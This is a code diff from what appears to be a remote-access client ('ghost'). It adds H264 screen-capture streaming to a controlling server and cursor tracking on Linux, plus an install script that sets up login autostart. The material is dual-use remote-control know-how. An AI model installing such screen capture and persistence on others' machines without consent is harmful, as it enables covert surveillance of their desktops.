return pXOpenDisplay && pXCloseDisplay && pXGetImage && pXDestroyImage && return pXOpenDisplay && pXCloseDisplay && pXGetImage && pXDestroyImage &&
pXDefaultScreen && pXDisplayWidth && pXDisplayHeight && pXRootWindow && pXDefaultScreen && pXDisplayWidth && pXDisplayHeight && pXRootWindow &&
pXSetErrorHandler && pXCreatePixmap && pXFreePixmap && pXSetErrorHandler && pXCreatePixmap && pXFreePixmap &&
@@ -513,8 +564,18 @@ public:
return pXTestFakeMotionEvent && pXTestFakeButtonEvent && pXTestFakeKeyEvent; return pXTestFakeMotionEvent && pXTestFakeButtonEvent && pXTestFakeKeyEvent;
} }
// 检查 XFixes 扩展是否可用
bool HasXFixes() const
{
return pXFixesGetCursorImage != nullptr;
}
~X11Loader() ~X11Loader()
{ {
if (m_xfixes_handle) {
dlclose(m_xfixes_handle);
m_xfixes_handle = nullptr;
}
if (m_xtst_handle) { if (m_xtst_handle) {
dlclose(m_xtst_handle); dlclose(m_xtst_handle);
m_xtst_handle = nullptr; m_xtst_handle = nullptr;
@@ -528,6 +589,7 @@ public:
private: private:
void* m_handle; void* m_handle;
void* m_xtst_handle; void* m_xtst_handle;
void* m_xfixes_handle;
}; };
class ScreenHandler : public IOCPManager class ScreenHandler : public IOCPManager
@@ -538,7 +600,8 @@ public:
m_inputDisplay(nullptr), m_inputDisplay(nullptr),
m_width(0), m_height(0), m_width(0), m_height(0),
m_pixmap(0), m_gc(nullptr), m_xtestWarned(false), m_pixmap(0), m_gc(nullptr), m_xtestWarned(false),
m_bAlgorithm(ALGORITHM_DIFF), m_maxFPS(10), m_qualityLevel(QUALITY_ADAPTIVE) m_bAlgorithm(ALGORITHM_DIFF), m_maxFPS(10), m_qualityLevel(QUALITY_ADAPTIVE),
m_h264Bitrate(2000)
{ {
if (!client) { if (!client) {
throw std::invalid_argument("IOCPClient pointer cannot be null"); throw std::invalid_argument("IOCPClient pointer cannot be null");
@@ -651,11 +714,21 @@ public:
// Double-check after acquiring lock // Double-check after acquiring lock
if (m_destroyed) return; if (m_destroyed) return;
// Prevent starting if thread is already running or joinable // If already running, just send TOKEN_BITMAPINFO again
if (m_captureThread.joinable()) return; // This allows server to create additional dialogs (MFC can open while Web is active)
if (m_captureThread.joinable() || m_running.load()) {
Mprintf(">>> ScreenHandler already running, sending TOKEN_BITMAPINFO for new dialog\n");
SendBitmapInfo();
return;
}
bool expected = false; bool expected = false;
if (!m_running.compare_exchange_strong(expected, true)) return; if (!m_running.compare_exchange_strong(expected, true)) {
// Race condition: another thread started first, send bitmap info
Mprintf(">>> ScreenHandler race, sending TOKEN_BITMAPINFO for new dialog\n");
SendBitmapInfo();
return;
}
m_captureThread = std::thread(&ScreenHandler::CaptureLoop, this); m_captureThread = std::thread(&ScreenHandler::CaptureLoop, this);
} }
@@ -838,7 +911,14 @@ public:
// 加载保存的质量设置 // 加载保存的质量设置
void LoadQualitySettings() void LoadQualitySettings()
{ {
m_qualityLevel = (int8_t)m_config.GetInt("QualityLevel", QUALITY_ADAPTIVE); // Default to QUALITY_GOOD (H264 1080P) — same as Windows ScreenManager.cpp
// and the explicit hardcoded default in macos/ScreenHandler.mm. Using
// QUALITY_ADAPTIVE here told the controller's EvaluateQuality to auto-
// upgrade to Ultra/High (DIFF/RGB565), breaking web sessions whose
// browser decoder only handles H264. Web sessions also get a clamp on
// the server side as defense in depth; this default change ensures
// Linux clients don't request adaptive in the first place.
m_qualityLevel = (int8_t)m_config.GetInt("QualityLevel", QUALITY_GOOD);
Mprintf(">>> LoadQualitySettings: level=%d\n", m_qualityLevel); Mprintf(">>> LoadQualitySettings: level=%d\n", m_qualityLevel);
// 如果有保存的具体等级,立即应用 // 如果有保存的具体等级,立即应用
@@ -873,12 +953,28 @@ public:
// 应用帧率 // 应用帧率
m_maxFPS.store(profile.maxFPS); m_maxFPS.store(profile.maxFPS);
// 应用码率H264 使用)
int oldBitrate = m_h264Bitrate;
m_h264Bitrate = profile.bitRate;
// 应用算法(带降级处理) // 应用算法(带降级处理)
uint8_t algo = GetEffectiveAlgorithm(profile.algorithm); uint8_t algo = GetEffectiveAlgorithm(profile.algorithm);
uint8_t oldAlgo = m_bAlgorithm.load();
m_bAlgorithm.store(algo); m_bAlgorithm.store(algo);
Mprintf(">>> Quality: Level=%d, FPS=%d, Algo=%d->%d\n", // 如果 H264 参数变化,需要重新初始化编码器
level, profile.maxFPS, profile.algorithm, algo); if (algo == ALGORITHM_H264 && oldAlgo == ALGORITHM_H264 &&
(oldBitrate != m_h264Bitrate)) {
// 码率变化,重置编码器(下次编码时重新初始化)
if (m_h264Encoder) {
m_h264Encoder->close();
m_h264Encoder.reset();
Mprintf(">>> H264 encoder reset due to bitrate change\n");
}
}
Mprintf(">>> Quality: Level=%d, FPS=%d, Algo=%d->%d, Bitrate=%d\n",
level, profile.maxFPS, profile.algorithm, algo, profile.bitRate);
} else { } else {
// 自适应模式 (level=-1):由服务端动态调整,不做处理 // 自适应模式 (level=-1):由服务端动态调整,不做处理
Mprintf(">>> Quality: Adaptive mode\n"); Mprintf(">>> Quality: Adaptive mode\n");
@@ -1044,11 +1140,15 @@ private:
std::vector<uint8_t> m_diffBuffer; std::vector<uint8_t> m_diffBuffer;
// 自适应质量控制 // 自适应质量控制
std::atomic<uint8_t> m_bAlgorithm; // 当前算法 (ALGORITHM_DIFF/RGB565/GRAY) std::atomic<uint8_t> m_bAlgorithm; // 当前算法 (ALGORITHM_DIFF/RGB565/GRAY/H264)
std::atomic<int> m_maxFPS; // 最大帧率 std::atomic<int> m_maxFPS; // 最大帧率
int8_t m_qualityLevel; // 当前质量等级 (-1=自适应, 0-5=具体等级) int8_t m_qualityLevel; // 当前质量等级 (-1=自适应, 0-5=具体等级)
LinuxConfig m_config; // 配置持久化 (~/.config/ghost/config.conf) LinuxConfig m_config; // 配置持久化 (~/.config/ghost/config.conf)
// H264 编码器
std::unique_ptr<X264Encoder> m_h264Encoder;
int m_h264Bitrate; // 码率 (kbps)
// X11 截屏,输出 BGRA 格式(自底向上,与 BMP 一致) // X11 截屏,输出 BGRA 格式(自底向上,与 BMP 一致)
// 使用 XCopyArea 将 root window 拷贝到离屏 Pixmap再对 Pixmap 调用 XGetImage // 使用 XCopyArea 将 root window 拷贝到离屏 Pixmap再对 Pixmap 调用 XGetImage
// 这样可以避免合成窗口管理器Mutter 等)导致的 BadMatch 错误 // 这样可以避免合成窗口管理器Mutter 等)导致的 BadMatch 错误
@@ -1120,13 +1220,14 @@ private:
uint8_t algo = m_bAlgorithm.load(); uint8_t algo = m_bAlgorithm.load();
memcpy(data, &algo, sizeof(uint8_t)); memcpy(data, &algo, sizeof(uint8_t));
// 写入光标位置 (Linux 端简单置 0) // 写入光标位置
int32_t cursorX = 0, cursorY = 0; int32_t cursorX = 0, cursorY = 0;
GetCursorPosition(cursorX, cursorY);
memcpy(data + 1, &cursorX, sizeof(int32_t)); memcpy(data + 1, &cursorX, sizeof(int32_t));
memcpy(data + 1 + sizeof(int32_t), &cursorY, sizeof(int32_t)); memcpy(data + 1 + sizeof(int32_t), &cursorY, sizeof(int32_t));
// 写入光标类型 // 写入光标类型 (使用 XFixes 检测)
uint8_t cursorType = 0; uint8_t cursorType = GetCursorTypeIndex();
memcpy(data + 1 + 2 * sizeof(int32_t), &cursorType, sizeof(uint8_t)); memcpy(data + 1 + 2 * sizeof(int32_t), &cursorType, sizeof(uint8_t));
uint32_t headerSize = 1 + 2 * sizeof(int32_t) + 1; // algo + cursor + cursorType uint32_t headerSize = 1 + 2 * sizeof(int32_t) + 1; // algo + cursor + cursorType
@@ -1141,6 +1242,60 @@ private:
std::swap(m_prevFrame, m_currFrame); std::swap(m_prevFrame, m_currFrame);
} }
// 发送 H264 编码帧
void SendH264Frame(bool forceKeyframe = false)
{
if (!CaptureScreen(m_currFrame)) return;
if (!m_client) return;
// 惰性初始化编码器
if (!m_h264Encoder) {
m_h264Encoder.reset(new X264Encoder());
int fps = m_maxFPS.load();
if (fps <= 0) fps = 20;
int crf = BitRateToCRF(m_h264Bitrate);
if (!m_h264Encoder->open(m_bmpHeader.biWidth, m_bmpHeader.biHeight, fps, crf)) {
Mprintf("*** H264 encoder init failed, falling back to RGB565\n");
m_bAlgorithm.store(ALGORITHM_RGB565);
m_h264Encoder.reset();
SendDiffFrame();
return;
}
Mprintf(">>> H264 encoder initialized: %dx%d @ %d fps, CRF=%d\n",
m_bmpHeader.biWidth, m_bmpHeader.biHeight, fps, crf);
}
// 编码当前帧
uint8_t* encodedData = nullptr;
uint32_t encodedSize = 0;
// direction=1 表示 bottom-up (BMP 格式)
int result = m_h264Encoder->encode(
m_currFrame.data(), 32, m_bmpHeader.biWidth * 4,
m_bmpHeader.biWidth, m_bmpHeader.biHeight,
&encodedData, &encodedSize, 1);
if (result != 0 || !encodedData || encodedSize == 0) {
return;
}
// 构建数据包: [TOKEN_NEXTSCREEN][algo][cursorX][cursorY][cursorType][H264Data]
uint32_t headerSize = 1 + 1 + 2 * sizeof(int32_t) + 1;
std::vector<uint8_t> packet(headerSize + encodedSize);
packet[0] = TOKEN_NEXTSCREEN;
packet[1] = ALGORITHM_H264;
int32_t cursorX = 0, cursorY = 0;
GetCursorPosition(cursorX, cursorY);
memcpy(&packet[2], &cursorX, sizeof(int32_t));
memcpy(&packet[6], &cursorY, sizeof(int32_t));
packet[10] = GetCursorTypeIndex(); // 使用 XFixes 检测光标类型
memcpy(&packet[headerSize], encodedData, encodedSize);
m_client->Send2Server((char*)packet.data(), packet.size());
}
// 差异比较算法(支持 DIFF/RGB565/GRAY // 差异比较算法(支持 DIFF/RGB565/GRAY
// 输出格式: [byteOffset(4) + length(4) + pixel data] ... // 输出格式: [byteOffset(4) + length(4) + pixel data] ...
// DIFF: length = 字节数, data = BGRA 原始数据 // DIFF: length = 字节数, data = BGRA 原始数据
@@ -1224,6 +1379,118 @@ private:
return (uint64_t)ts.tv_sec * 1000 + ts.tv_nsec / 1000000; return (uint64_t)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
} }
// 获取光标位置
void GetCursorPosition(int32_t& x, int32_t& y)
{
x = 0;
y = 0;
// 检查是否正在运行和资源是否有效
if (!m_running.load() || m_destroyed.load()) {
static bool warned = false;
if (!warned) {
Mprintf("*** GetCursorPosition: skipped (running=%d, destroyed=%d)\n",
m_running.load(), m_destroyed.load());
warned = true;
}
return;
}
Display* display = m_display; // 局部拷贝
if (!display || !m_x11.pXQueryPointer) {
static bool warned = false;
if (!warned) {
Mprintf("*** GetCursorPosition: display=%p, pXQueryPointer=%p\n",
(void*)display, (void*)m_x11.pXQueryPointer);
warned = true;
}
return;
}
Window root_return, child_return;
int root_x, root_y, win_x, win_y;
unsigned int mask;
if (m_x11.pXQueryPointer(display, m_root, &root_return, &child_return,
&root_x, &root_y, &win_x, &win_y, &mask)) {
x = root_x;
y = root_y;
// Clamp to screen bounds
if (x < 0) x = 0;
if (y < 0) y = 0;
if (x >= m_width) x = m_width - 1;
if (y >= m_height) y = m_height - 1;
}
}
// 获取光标类型索引(映射到 Windows 光标类型)
// Windows cursor type indices (from CursorInfo.h):
// 0: IDC_APPSTARTING, 1: IDC_ARROW, 2: IDC_CROSS, 3: IDC_HAND,
// 4: IDC_HELP, 5: IDC_IBEAM, 6: IDC_ICON, 7: IDC_NO,
// 8: IDC_SIZE, 9: IDC_SIZEALL, 10: IDC_SIZENESW, 11: IDC_SIZENS,
// 12: IDC_SIZENWSE, 13: IDC_SIZEWE, 14: IDC_UPARROW, 15: IDC_WAIT
uint8_t GetCursorTypeIndex()
{
// Cache result and throttle to avoid performance impact
static uint8_t cachedIndex = 1; // Default: IDC_ARROW
static uint64_t lastCheckTime = 0;
static unsigned long lastCursorSerial = 0;
// Throttle: check at most every 100ms
uint64_t now = GetTickMs();
if ((now - lastCheckTime) < 100) {
return cachedIndex;
}
lastCheckTime = now;
// Check if XFixes is available and XFree is loaded
if (!m_x11.HasXFixes() || !m_x11.pXFree || !m_display) {
return 1; // IDC_ARROW
}
// Get current cursor image
XFixesCursorImage* cursorImg = m_x11.pXFixesGetCursorImage(m_display);
if (!cursorImg) {
return cachedIndex;
}
// Check if cursor changed (using serial number)
if (cursorImg->cursor_serial == lastCursorSerial) {
// Cursor hasn't changed, use cached value
// Note: We need to free the cursor image
// XFixes allocates this with Xlib's allocator
m_x11.pXFree(cursorImg);
return cachedIndex;
}
lastCursorSerial = cursorImg->cursor_serial;
// Analyze cursor characteristics to determine type
uint8_t index = 1; // Default to IDC_ARROW
unsigned short w = cursorImg->width;
unsigned short h = cursorImg->height;
unsigned short xhot = cursorImg->xhot;
unsigned short yhot = cursorImg->yhot;
// Heuristic-based cursor type detection (conservative approach):
// Only detect distinctive cursor types to minimize false positives
// IBEAM (text cursor): very narrow, tall cursor
if (w <= 8 && h >= 12 && xhot <= w/2 + 1) {
index = 5; // IDC_IBEAM
}
// HAND (pointing): hotspot at top-left area (finger tip)
else if (w >= 18 && h >= 20 && xhot <= 10 && yhot <= 5) {
index = 3; // IDC_HAND
}
// All other cursors default to ARROW
cachedIndex = index;
m_x11.pXFree(cursorImg);
return index;
}
// 截屏主循环 // 截屏主循环
void CaptureLoop() void CaptureLoop()
{ {
@@ -1233,10 +1500,34 @@ private:
// 发送第一帧 // 发送第一帧
SendFirstScreen(); SendFirstScreen();
uint8_t currentAlgo = m_bAlgorithm.load();
while (m_running) { while (m_running) {
uint64_t start = GetTickMs(); uint64_t start = GetTickMs();
uint8_t algo = m_bAlgorithm.load();
SendDiffFrame(); // 算法切换处理
if (algo != currentAlgo) {
currentAlgo = algo;
if (algo == ALGORITHM_H264) {
// 切换到 H264发送关键帧
SendH264Frame(true);
} else {
// 切换离开 H264关闭编码器并发送完整帧
if (m_h264Encoder) {
m_h264Encoder->close();
m_h264Encoder.reset();
}
SendFirstScreen();
}
} else {
// 正常帧
if (algo == ALGORITHM_H264) {
SendH264Frame(false);
} else {
SendDiffFrame();
}
}
// 动态计算帧间隔(根据当前 maxFPS // 动态计算帧间隔(根据当前 maxFPS
int fps = m_maxFPS.load(); int fps = m_maxFPS.load();
@@ -1250,6 +1541,12 @@ private:
} }
} }
// 清理 H264 编码器
if (m_h264Encoder) {
m_h264Encoder->close();
m_h264Encoder.reset();
}
Mprintf(">>> ScreenHandler CaptureLoop stopped\n"); Mprintf(">>> ScreenHandler CaptureLoop stopped\n");
} catch (const std::exception& e) { } catch (const std::exception& e) {
Mprintf("*** CaptureLoop exception: %s ***\n", e.what()); Mprintf("*** CaptureLoop exception: %s ***\n", e.what());

471
linux/X264Encoder.h Normal file
View File

@@ -0,0 +1,471 @@
#pragma once
/**
* X264Encoder.h - Linux H264 Encoder using libx264
*
* Features:
* - Dynamic library loading (dlopen/dlsym)
* - Automatic fallback if libx264 not available
* - Manual BGRA→I420 conversion (no libyuv dependency)
* - API compatible with Windows X264Encoder
*
* Requirements:
* - libx264 installed (apt install libx264-dev)
* - If not installed, H264 encoding is disabled
*/
#include <stdint.h>
#include <cstring>
#include <cstdlib>
#include <dlfcn.h>
#include <vector>
// Include x264 header for struct definitions
// The library is dynamically loaded at runtime
extern "C" {
#include "../compress/x264/x264.h"
}
// ============== X264Encoder Class ==============
class X264Encoder {
public:
// Check if libx264 is available on this system
static bool IsAvailable() {
static int available = -1;
if (available < 0) {
void* handle = TryLoadLibrary();
available = (handle != nullptr) ? 1 : 0;
if (handle) {
dlclose(handle);
fprintf(stderr, ">>> X264Encoder: libx264 available\n");
} else {
fprintf(stderr, "*** X264Encoder: libx264 not found (%s)\n", dlerror());
}
}
return available == 1;
}
X264Encoder()
: m_x264Handle(nullptr)
, m_encoder(nullptr)
, m_picIn(nullptr)
, m_picOut(nullptr)
, m_width(0)
, m_height(0)
{
memset(&m_param, 0, sizeof(m_param));
clearFunctionPointers();
}
~X264Encoder() {
close();
}
bool open(int width, int height, int fps, int crf) {
close();
// Load library
if (!loadLibrary()) {
fprintf(stderr, "*** X264Encoder::open: loadLibrary failed\n");
return false;
}
// Round to even dimensions (H264 requirement)
m_width = width & ~1;
m_height = height & ~1;
// Initialize parameters
if (fn_x264_param_default_preset) {
fn_x264_param_default_preset(&m_param, "ultrafast", "zerolatency");
}
// Set encoder parameters
m_param.i_width = m_width;
m_param.i_height = m_height;
m_param.i_log_level = X264_LOG_NONE;
m_param.i_threads = 1;
m_param.i_frame_total = 0;
m_param.i_keyint_max = fps * 15; // Keyframe every 15 seconds
m_param.i_bframe = 0; // No B-frames for low latency
m_param.b_open_gop = 0;
m_param.i_fps_num = fps;
m_param.i_fps_den = 1;
m_param.i_csp = X264_CSP_I420;
// Rate control: CRF mode
m_param.rc.i_rc_method = X264_RC_CRF;
m_param.rc.f_rf_constant = (float)crf;
// Apply baseline profile for compatibility
if (fn_x264_param_apply_profile) {
fn_x264_param_apply_profile(&m_param, "baseline");
}
// Allocate pictures
m_picIn = (x264_picture_t*)calloc(1, sizeof(x264_picture_t));
m_picOut = (x264_picture_t*)calloc(1, sizeof(x264_picture_t));
if (!m_picIn || !m_picOut) {
close();
return false;
}
// Initialize input picture
if (fn_x264_picture_init) {
fn_x264_picture_init(m_picIn);
}
// Allocate picture buffer
if (fn_x264_picture_alloc) {
if (fn_x264_picture_alloc(m_picIn, X264_CSP_I420, m_width, m_height) < 0) {
close();
return false;
}
}
// Open encoder
m_encoder = fn_x264_encoder_open(&m_param);
if (!m_encoder) {
close();
return false;
}
return true;
}
void close() {
if (m_encoder && fn_x264_encoder_close) {
fn_x264_encoder_close(m_encoder);
m_encoder = nullptr;
}
if (m_picIn) {
if (fn_x264_picture_clean) {
fn_x264_picture_clean(m_picIn);
}
free(m_picIn);
m_picIn = nullptr;
}
if (m_picOut) {
free(m_picOut);
m_picOut = nullptr;
}
unloadLibrary();
m_width = m_height = 0;
}
/**
* Encode a frame
* @param bgra Input BGRA image data
* @param bpp Bits per pixel (24 or 32)
* @param stride Bytes per row
* @param width Image width
* @param height Image height
* @param outData Output: pointer to encoded H264 data
* @param outSize Output: size of encoded data
* @param direction 1 = normal, -1 = vertical flip
* @return 0 on success, negative on error
*/
int encode(uint8_t* bgra, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** outData, uint32_t* outSize,
int direction = 1)
{
if (!m_encoder || !m_picIn || !fn_x264_encoder_encode) {
return -1;
}
// Check dimensions match
if ((int)(width & ~1) != m_width || (int)(height & ~1) != m_height) {
return -2;
}
// Convert BGRA to I420 directly into x264 picture planes
if (bpp == 32) {
convertBGRAtoI420(bgra, stride, direction,
m_picIn->img.plane[0], m_picIn->img.i_stride[0],
m_picIn->img.plane[1], m_picIn->img.i_stride[1],
m_picIn->img.plane[2], m_picIn->img.i_stride[2]);
} else if (bpp == 24) {
convertRGB24toI420(bgra, stride, direction,
m_picIn->img.plane[0], m_picIn->img.i_stride[0],
m_picIn->img.plane[1], m_picIn->img.i_stride[1],
m_picIn->img.plane[2], m_picIn->img.i_stride[2]);
} else {
return -3;
}
// Encode
x264_nal_t* pNal = nullptr;
int iNal = 0;
int encodeSize = fn_x264_encoder_encode(m_encoder, &pNal, &iNal, m_picIn, m_picOut);
if (encodeSize < 0) {
return -4;
}
if (encodeSize == 0 || !pNal) {
*outData = nullptr;
*outSize = 0;
return 0;
}
*outData = pNal->p_payload;
*outSize = encodeSize;
return 0;
}
private:
// Library handle
void* m_x264Handle;
// Encoder state
x264_t* m_encoder;
x264_param_t m_param;
x264_picture_t* m_picIn;
x264_picture_t* m_picOut;
int m_width, m_height;
// x264 function pointers
void (*fn_x264_param_default_preset)(x264_param_t*, const char*, const char*);
int (*fn_x264_param_apply_profile)(x264_param_t*, const char*);
x264_t* (*fn_x264_encoder_open)(x264_param_t*);
void (*fn_x264_encoder_close)(x264_t*);
int (*fn_x264_encoder_encode)(x264_t*, x264_nal_t**, int*, x264_picture_t*, x264_picture_t*);
void (*fn_x264_picture_init)(x264_picture_t*);
int (*fn_x264_picture_alloc)(x264_picture_t*, int, int, int);
void (*fn_x264_picture_clean)(x264_picture_t*);
void clearFunctionPointers() {
fn_x264_param_default_preset = nullptr;
fn_x264_param_apply_profile = nullptr;
fn_x264_encoder_open = nullptr;
fn_x264_encoder_close = nullptr;
fn_x264_encoder_encode = nullptr;
fn_x264_picture_init = nullptr;
fn_x264_picture_alloc = nullptr;
fn_x264_picture_clean = nullptr;
}
static void* TryLoadLibrary() {
// Try multiple library versions (newest first)
const char* libNames[] = {
"libx264.so", // symlink (if exists)
"libx264.so.164", // Ubuntu 24, Debian 12+
"libx264.so.163",
"libx264.so.162",
"libx264.so.161",
"libx264.so.160",
"libx264.so.159",
"libx264.so.157",
"libx264.so.155", // Ubuntu 20
"libx264.so.152",
"libx264.so.148", // older distros
nullptr
};
for (int i = 0; libNames[i]; i++) {
void* handle = dlopen(libNames[i], RTLD_LAZY);
if (handle) return handle;
}
return nullptr;
}
bool loadLibrary() {
m_x264Handle = TryLoadLibrary();
if (!m_x264Handle) {
return false;
}
// Load functions
fn_x264_param_default_preset = (decltype(fn_x264_param_default_preset))
dlsym(m_x264Handle, "x264_param_default_preset");
fn_x264_param_apply_profile = (decltype(fn_x264_param_apply_profile))
dlsym(m_x264Handle, "x264_param_apply_profile");
fn_x264_picture_init = (decltype(fn_x264_picture_init))
dlsym(m_x264Handle, "x264_picture_init");
fn_x264_picture_alloc = (decltype(fn_x264_picture_alloc))
dlsym(m_x264Handle, "x264_picture_alloc");
fn_x264_picture_clean = (decltype(fn_x264_picture_clean))
dlsym(m_x264Handle, "x264_picture_clean");
fn_x264_encoder_close = (decltype(fn_x264_encoder_close))
dlsym(m_x264Handle, "x264_encoder_close");
// x264_encoder_open has version suffix based on X264_BUILD
// Try common versions in order (newest first)
const char* openNames[] = {
"x264_encoder_open_164",
"x264_encoder_open_163",
"x264_encoder_open_162",
"x264_encoder_open_161",
"x264_encoder_open_160",
"x264_encoder_open_159",
"x264_encoder_open_157",
"x264_encoder_open_155",
"x264_encoder_open_152",
"x264_encoder_open_148",
nullptr
};
for (int i = 0; openNames[i]; i++) {
fn_x264_encoder_open = (decltype(fn_x264_encoder_open))
dlsym(m_x264Handle, openNames[i]);
if (fn_x264_encoder_open) {
fprintf(stderr, ">>> X264Encoder: found %s\n", openNames[i]);
break;
}
}
fn_x264_encoder_encode = (decltype(fn_x264_encoder_encode))
dlsym(m_x264Handle, "x264_encoder_encode");
// Check required functions
if (!fn_x264_encoder_open || !fn_x264_encoder_encode || !fn_x264_encoder_close ||
!fn_x264_param_default_preset || !fn_x264_picture_alloc) {
fprintf(stderr, "*** X264Encoder: missing functions - open=%p encode=%p close=%p preset=%p alloc=%p\n",
(void*)fn_x264_encoder_open, (void*)fn_x264_encoder_encode,
(void*)fn_x264_encoder_close, (void*)fn_x264_param_default_preset,
(void*)fn_x264_picture_alloc);
unloadLibrary();
return false;
}
return true;
}
void unloadLibrary() {
if (m_x264Handle) {
dlclose(m_x264Handle);
m_x264Handle = nullptr;
}
clearFunctionPointers();
}
/**
* Convert BGRA to I420 (YUV 4:2:0 planar) directly into output planes
* Using ITU-R BT.601 coefficients
*/
void convertBGRAtoI420(const uint8_t* bgra, int stride, int direction,
uint8_t* yPlane, int yStride,
uint8_t* uPlane, int uStride,
uint8_t* vPlane, int vStride) {
int srcStride = stride;
int w = m_width;
int h = m_height;
// Direction: 1 = normal, -1 = flip vertically
int startY = (direction > 0) ? 0 : (h - 1);
int stepY = (direction > 0) ? 1 : -1;
// Y plane: full resolution
for (int j = 0; j < h; j++) {
int srcY = startY + j * stepY;
const uint8_t* srcRow = bgra + srcY * srcStride;
uint8_t* dstRow = yPlane + j * yStride;
for (int i = 0; i < w; i++) {
uint8_t b = srcRow[i * 4 + 0];
uint8_t g = srcRow[i * 4 + 1];
uint8_t r = srcRow[i * 4 + 2];
// Y = 0.257*R + 0.504*G + 0.098*B + 16
int y = ((66 * r + 129 * g + 25 * b + 128) >> 8) + 16;
dstRow[i] = (uint8_t)(y < 0 ? 0 : (y > 255 ? 255 : y));
}
}
// U/V planes: half resolution (2x2 block averaging)
int uvW = w / 2;
int uvH = h / 2;
for (int j = 0; j < uvH; j++) {
int srcY0 = startY + (j * 2) * stepY;
int srcY1 = startY + (j * 2 + 1) * stepY;
const uint8_t* row0 = bgra + srcY0 * srcStride;
const uint8_t* row1 = bgra + srcY1 * srcStride;
for (int i = 0; i < uvW; i++) {
// Average 4 pixels
int r = 0, g = 0, b = 0;
b += row0[(i*2+0)*4 + 0]; g += row0[(i*2+0)*4 + 1]; r += row0[(i*2+0)*4 + 2];
b += row0[(i*2+1)*4 + 0]; g += row0[(i*2+1)*4 + 1]; r += row0[(i*2+1)*4 + 2];
b += row1[(i*2+0)*4 + 0]; g += row1[(i*2+0)*4 + 1]; r += row1[(i*2+0)*4 + 2];
b += row1[(i*2+1)*4 + 0]; g += row1[(i*2+1)*4 + 1]; r += row1[(i*2+1)*4 + 2];
r >>= 2; g >>= 2; b >>= 2;
// U = -0.148*R - 0.291*G + 0.439*B + 128
int u = ((-38 * r - 74 * g + 112 * b + 128) >> 8) + 128;
// V = 0.439*R - 0.368*G - 0.071*B + 128
int v = ((112 * r - 94 * g - 18 * b + 128) >> 8) + 128;
uPlane[j * uStride + i] = (uint8_t)(u < 0 ? 0 : (u > 255 ? 255 : u));
vPlane[j * vStride + i] = (uint8_t)(v < 0 ? 0 : (v > 255 ? 255 : v));
}
}
}
/**
* Convert RGB24 to I420 (YUV 4:2:0 planar) directly into output planes
*/
void convertRGB24toI420(const uint8_t* rgb, int stride, int direction,
uint8_t* yPlane, int yStride,
uint8_t* uPlane, int uStride,
uint8_t* vPlane, int vStride) {
int srcStride = stride;
int w = m_width;
int h = m_height;
int startY = (direction > 0) ? 0 : (h - 1);
int stepY = (direction > 0) ? 1 : -1;
// Y plane
for (int j = 0; j < h; j++) {
int srcY = startY + j * stepY;
const uint8_t* srcRow = rgb + srcY * srcStride;
uint8_t* dstRow = yPlane + j * yStride;
for (int i = 0; i < w; i++) {
uint8_t r = srcRow[i * 3 + 0];
uint8_t g = srcRow[i * 3 + 1];
uint8_t b = srcRow[i * 3 + 2];
int y = ((66 * r + 129 * g + 25 * b + 128) >> 8) + 16;
dstRow[i] = (uint8_t)(y < 0 ? 0 : (y > 255 ? 255 : y));
}
}
// U/V planes
int uvW = w / 2;
int uvH = h / 2;
for (int j = 0; j < uvH; j++) {
int srcY0 = startY + (j * 2) * stepY;
int srcY1 = startY + (j * 2 + 1) * stepY;
const uint8_t* row0 = rgb + srcY0 * srcStride;
const uint8_t* row1 = rgb + srcY1 * srcStride;
for (int i = 0; i < uvW; i++) {
int r = 0, g = 0, b = 0;
r += row0[(i*2+0)*3 + 0]; g += row0[(i*2+0)*3 + 1]; b += row0[(i*2+0)*3 + 2];
r += row0[(i*2+1)*3 + 0]; g += row0[(i*2+1)*3 + 1]; b += row0[(i*2+1)*3 + 2];
r += row1[(i*2+0)*3 + 0]; g += row1[(i*2+0)*3 + 1]; b += row1[(i*2+0)*3 + 2];
r += row1[(i*2+1)*3 + 0]; g += row1[(i*2+1)*3 + 1]; b += row1[(i*2+1)*3 + 2];
r >>= 2; g >>= 2; b >>= 2;
int u = ((-38 * r - 74 * g + 112 * b + 128) >> 8) + 128;
int v = ((112 * r - 94 * g - 18 * b + 128) >> 8) + 128;
uPlane[j * uStride + i] = (uint8_t)(u < 0 ? 0 : (u > 255 ? 255 : u));
vPlane[j * vStride + i] = (uint8_t)(v < 0 ? 0 : (v > 255 ? 255 : v));
}
}
}
};

BIN
linux/ghost
View File

Binary file not shown.

152
linux/install.sh Executable file
View File

@@ -0,0 +1,152 @@
#!/usr/bin/env bash
# YAMA Ghost (Linux client) — install + autostart deployment
#
# 用法(在解压/克隆后的 linux/ 目录下):
# ./install.sh # 默认安装到 ~/.local/bin/ghost
# ./install.sh /opt/yama # 安装到 /opt/yama/ghost如需要会自动 sudo
#
# 行为:
# 1. 复制 ghost 二进制到目标位置并加可执行权
# 2. 注册 XDG Autostart~/.config/autostart/ghost.desktop
# 3. 可选立即启动一次(继承当前桌面会话的 X 环境)
set -euo pipefail
# ---- 防止以 root 直接运行 ----
# 用 sudo 跑会让 $HOME 变成 /root或 sudo 配置决定的值),
# autostart 写到 /root/.config/autostart/,桌面用户的 session 看不见,
# 自启动完全失效。需要 sudo 的地方(如装到 /opt/...),脚本会按需自调用 sudo。
if [[ "${EUID:-$(id -u)}" -eq 0 ]]; then
echo "请用普通用户身份运行此脚本,不要 sudo。" >&2
echo "如目标目录需要 root 权限,脚本会按需自动调用 sudo。" >&2
exit 1
fi
# ---- 颜色 ----
if [[ -t 1 ]]; then
C_RED=$'\033[31m'; C_GREEN=$'\033[32m'; C_YELLOW=$'\033[33m'
C_BLUE=$'\033[34m'; C_BOLD=$'\033[1m'; C_RESET=$'\033[0m'
else
C_RED=''; C_GREEN=''; C_YELLOW=''; C_BLUE=''; C_BOLD=''; C_RESET=''
fi
info() { echo "${C_BLUE}[INFO]${C_RESET} $*"; }
ok() { echo "${C_GREEN}[ OK ]${C_RESET} $*"; }
warn() { echo "${C_YELLOW}[WARN]${C_RESET} $*"; }
error() { echo "${C_RED}[FAIL]${C_RESET} $*" >&2; }
# ---- 路径解析 ----
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
SRC_BIN="${SCRIPT_DIR}/ghost"
# 安装目标目录(参数 $1默认 ~/.local/bin
INSTALL_DIR="${1:-${HOME}/.local/bin}"
DEST_BIN="${INSTALL_DIR}/ghost"
AUTOSTART_DIR="${XDG_CONFIG_HOME:-${HOME}/.config}/autostart"
AUTOSTART_FILE="${AUTOSTART_DIR}/ghost.desktop"
